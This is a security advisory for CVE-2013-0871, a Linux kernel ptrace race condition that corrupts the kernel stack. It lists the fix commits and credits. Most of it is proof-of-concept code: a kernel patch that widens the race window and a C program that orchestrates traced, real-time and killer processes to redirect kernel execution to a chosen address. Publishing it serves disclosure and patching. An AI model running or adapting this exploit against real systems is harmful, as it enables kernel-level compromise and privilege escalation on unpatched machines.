Linux kernel stack corruption due to race condition with PTRACE_SETREGS
-----------------------------------------------------------------------
A race conditon in ptrace can lead to kernel stack corruption and arbitrary
kernel-mode code execution. At first glance, this may be worst Linux kernel vulnerability
in a few years according to Alexander AKA Solar Designer (solar@openwall.com). He goes
on to say "For distro vendor kernels (rather than mainline, which was patched almost a
month ago), this is a 0-day."
This should be tracked as CVE-2013-0871.
Solution
------------
The following commits from Oleg Nesterov should address the issue:
- 910ffdb18a6408e14febbb6e4b6840fd2c928c82
- 9899d11f654474d2d54ea52ceaa2a1f4db3abd68
- 9067ac85d533651b98c2ff903182a20cbb361fcb
Credit
---------
This was discovered by Suleiman Souhlal and Salman Qazi of Google, with help
from Aaron Durbin and Michael Davidson, also of Google.
Code
--------
Salman Qazi provided the following PoC code:
Kernel patch for easy reproduction:
diff --git a/arch/x86/kernel/ptrace.c b/arch/x86/kernel/ptrace.c
index b629bbe..e22617e 100644
--- a/arch/x86/kernel/ptrace.c
+++ b/arch/x86/kernel/ptrace.c
@@ -24,6 +24,7 @@
#include <linux/rcupdate.h>
#include <linux/module.h>
#include <linux/context_tracking.h>
+#include <linux/delay.h>
#include <asm/uaccess.h>
#include <asm/pgtable.h>
@@ -902,6 +903,12 @@ long arch_ptrace(struct task_struct *child, long request,
datap);
case PTRACE_SETREGS: /* Set all gp regs in the child. */
+ if (!strcmp(current->comm, "ptrace_death")) {
+ int i;
+ WARN_ON_ONCE(1);
+ for (i = 0 ; i < 15; i++)
+ mdelay(10);
+ }
return copy_regset_from_user(child,
task_user_regset_view(current),
REGSET_GENERAL,
source code for ptrace_death:
/*
* Repro case for SETREGS arbitrary ring zero execution bug.
*
* The specific scenario that we attempt to create:
*
* V does a syscall. It is being traced by P. P
* upon stopping V with PTRACE_SYSCALL and waiting for it, proceeds
* to read its registers. At this time P is asleep and an RT process S
* starts running.
*
* Then P proceeds to write V's registers, at shortly it has done this
* another process K kills V. Process S goes to sleep permitting V
* space to run. V wakes up from its waiting state and heads for the exit.
* But, S quickly wakes up again by the time V has reached schedule(). V
* is no longer running (since S has the CPU)
* and P modifies its regs. When V finally starts running
* and returns from schedule(), it pops an incorrect value from the
* stack. The reason is that the stack on which schedule() is called
* does not have the final 6 registers in pt_regs on it. That means that
* when P modifies V's registers, it is actually overwriting the stack
* frame saved for schedule(), including the return RIP.
*
* V and S and pinned to CPU 0. S is an RT task so that it can control
* when V does and doesn't run.
* remaining processes are not allowed on 0.
*
*/
#include <sched.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
#include <signal.h>
/* S */
int nuke_cpu(void)
{
int pid0;
int i;
unsigned long mask = 1;
pid0 = fork();
if (!pid0) {
struct sched_param p = {};
p.sched_priority = sched_get_priority_min(SCHED_FIFO);
assert(!sched_setscheduler(0, SCHED_FIFO, &p));
assert(!sched_setaffinity(0, sizeof(mask), &mask));
i = 0;
usleep(120000);
while(1) {
if (i == 50000) {
usleep(10);
printf("x");
fflush(stdout);
}
i++;
}
}
return pid0;
}
int once()
{
long i;
int pid0;
int pid;
unsigned long mask = 1;
struct user_regs_struct regs;
assert(!sched_setaffinity(0, sizeof(mask), &mask));
pid = fork();
if (!pid) {
/* V */
while (1) {
/* Put our chosen RIP in callee saved registers */
asm __volatile__ (
"mov $0x1eadbeef, %%rbx\n"
"mov $0x1eadbeef, %%rbp\n"
"mov $0x1eadbeef, %%r12\n"
"mov $0x1eadbeef, %%r13\n"
"mov $0x1eadbeef, %%r14\n"
"mov $0x1eadbeef, %%r15\n"
"mov $0, %%rsi\n"
"mov $0, %%rdi\n"
"mov $0x6d, %%rax\n"
"syscall":::"rax","rsi","rdi",
"r12", "rbx");
}
} else {
/* P */
assert(!ptrace(PTRACE_ATTACH, pid, 0, 0));
wait(NULL);
assert(!ptrace(PTRACE_SETOPTIONS, pid, NULL,
PTRACE_O_TRACESYSGOOD |
PTRACE_O_TRACEFORK |
PTRACE_O_TRACEVFORK |
PTRACE_O_TRACECLONE));
while(1) {
int nuke_pid;
int pid2;
mask = 0xfffe;
assert(!sched_setaffinity(0, sizeof(mask), &mask));
/*Entry */
assert(!ptrace(PTRACE_SYSCALL, pid, NULL, 0, 0));
wait(NULL);
assert(!ptrace(PTRACE_GETREGS, pid, NULL, ®s));
nuke_pid = nuke_cpu();
regs.orig_rax = 0x3c;
pid2 = fork();
if (!pid2) {
/* K */
usleep(120000);
kill(pid, SIGKILL);
printf(".");
fflush(stdout);
exit(0);
}
printf("{");
fflush(stdout);
if (!ptrace(PTRACE_SETREGS, pid, NULL, ®s)) {
printf("+");
} else {
printf("-");
}
ptrace(PTRACE_CONT, pid, NULL, 0, SIGKILL);
kill(pid, SIGKILL);
kill(pid2, SIGKILL);
kill(nuke_pid, SIGKILL);
exit(0);
}
}
}
int main(void) {
while (1) {
int pid = fork();
if (!pid) {
once();
}
wait(NULL);
}
}
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information